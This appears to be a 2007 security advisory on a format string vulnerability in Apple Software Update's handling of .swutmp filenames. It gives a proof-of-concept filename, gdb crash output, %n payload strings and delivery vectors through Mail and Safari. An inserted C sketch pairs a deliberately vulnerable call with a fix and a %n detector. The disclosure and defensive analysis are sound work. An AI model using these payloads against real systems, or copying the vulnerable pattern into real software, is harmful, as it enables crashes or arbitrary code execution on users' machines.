MOAB-24-01-2007: Apple Software Update Catalog Filename Format String Vulnerability

2007-01-29 00:00:00
vulners.com

Summary

Apple Software Update is used for delivering patches to end-users, such as the Apple Security Update 2007-001. It relies on the HTTP protocol for retrieving files associated with each available patch, and handles the application/x-apple.sucatalog+xml MIME type and the sucatalog and swutmp file extensions.

Software Update fails to properly handle filename strings carrying the swutmp extension. It is affected by a typical format string vulnerability, which can lead to a denial of service condition or arbitrary code execution.

See the 'Exploitation conditions' section for more information.
Affected versions

This issue has been verified with Apple Software Update Version 2.0.5 (2.0.5) on Mac OS X 10.4.8 (8L2127).
Proof of concept, exploit or instructions to reproduce

The following is the simplest way to demonstrate this issue:

$ touch %x.%x.%x.ThisIsEmbarrassing%x.%x.%x.%x.swutmp
$ open %x.%x.%x.ThisIsEmbarrassing%x.%x.%x.%x.swutmp

See the 'Exploitation conditions' section for more information on different vectors to trigger the issue.
Debugging information

The following debugging information shows Software Update crashing when opening a file with a crafted filename:

(gdb) r
Starting program: /System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update
Reading symbols for shared libraries … done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x9326aea3
0x9000c0c1 in __vfprintf ()
(gdb) i r
eax 0x9326aea3 -1826181469
ecx 0x0 0
edx 0x0 0
ebx 0x9000ad62 -1879003806
esp 0xbfffd600 0xbfffd600
ebp 0xbfffdd58 0xbfffdd58
esi 0xbfffed4e -1073746610
edi 0x25 37
eip 0x9000c0c1 0x9000c0c1 <__vfprintf+4976>
eflags 0x10282 66178
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0 0
gs 0x37 55
(gdb) back
#0 0x9000c0c1 in __vfprintf ()
#1 0x90100ea9 in snprintf_l ()
#2 0x908119d5 in _CFStringAppendFormatAndArgumentsAux ()
#3 0x9081091c in _CFStringCreateWithFormatAndArgumentsAux ()
#4 0x925daa5d in -[NSPlaceholderString initWithFormat:locale:arguments:] ()
#5 0x925fc670 in -[NSString initWithFormat:arguments:] ()
#6 0x9336056f in -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] ()
#7 0x934ac77a in _NXDoLocalRunAlertPanel ()
#8 0x93588ad6 in NSRunCriticalAlertPanel ()
#9 0x0000612a in ?? ()

(gdb) grep /s ThisIsEmbarrassing
Pattern found @ 0x1879433
0x1879433: "ThisIsEmbarrassing%n%n%n%#629AE"
Pattern found @ 0x3b792b
0x3b792b: "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmp???\005"
Pattern found @ 0x3b7c6b
0x3b7c6b: "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmpssing%25`???\a\001"
Pattern found @ 0x3b7cc4
0x3b7cc4: "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmp"
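The backtrace shows the crafted filename reaching NSRunCriticalAlertPanel() as its format argument, and the memory dump shows the same payload in its percent-encoded form (%25n) as it arrives through a browser download. The following C sketch is an added example, not code from the advisory or from Apple: it places that vulnerable call pattern beside the fixed one and adds the check a defender would run over incoming filenames, percent-decoding them the way a browser does and counting printf conversions, flagging %n. All function names are assumed; show_alert is a stand-in for the Cocoa API, not its implementation.

```c
#include <ctype.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for NSRunCriticalAlertPanel() above: arg 3 is a printf-style format. */
static void show_alert(char *out, size_t n, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, n, fmt, ap);
    va_end(ap);
}

/* Vulnerable call site: the filename is the format, so "%x" reads and "%n" writes. */
void alert_vulnerable(char *out, size_t n, const char *filename) {
    show_alert(out, n, filename);
}

/* Fixed call site: literal format, the filename is only a %s argument. */
void alert_fixed(char *out, size_t n, const char *filename) {
    show_alert(out, n, "Could not open %s", filename);
}

/* Percent-decode as a browser does before naming a download ("%25n" -> "%n"). */
void percent_decode(const char *in, char *out, size_t n) {
    size_t o = 0;
    for (size_t i = 0; in[i] && o + 1 < n; i++, o++) {
        out[o] = in[i];
        if (in[i] == '%' && isxdigit((unsigned char)in[i + 1]) && isxdigit((unsigned char)in[i + 2])) {
            out[o] = (char)strtol((char[]){in[i + 1], in[i + 2], 0}, NULL, 16);
            i += 2;
        }
    }
    out[o] = '\0';
}

/* Count printf conversions ("%%" is literal) and flag %n, which can write memory. */
int count_conversions(const char *s, int *has_n) {
    int count = 0;
    *has_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%' || *++p == '%') continue;   /* then skip flags, width, length */
        while (*p && strchr("-+ #0123456789.*hlLqjzt$", *p)) p++;
        if (!*p) break;
        count++;
        *has_n |= (*p == 'n');
    }
    return count;
}
```

A filename with any conversion at all is suspicious for this MIME handler; one containing %n after decoding is the case that turns a crash into a write.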

Notes
Exploitation conditions

We are conducting further tests around Software Update and possible vectors to abuse this issue. So far we have tested Mail.app via a crafted attachment, 'pushing' Safari to download the file (which is saved automatically to the user's Desktop folder when it is served with the associated MIME type application/x-apple.sucatalog+xml), and, obviously, opening the file locally.

There are other potential methods to abuse it, so this advisory may be updated as new details become available and are tested.
Workaround or temporary solution

Wait for Apple to release a patch for Software Update via Software Update.

"Ah, #23 explains #22 a little. It almost seems like they're wording it so a crash could lead to a root shell in all cases." -- Someone who missed Sesame Street's "We Learn Reading with Duckie".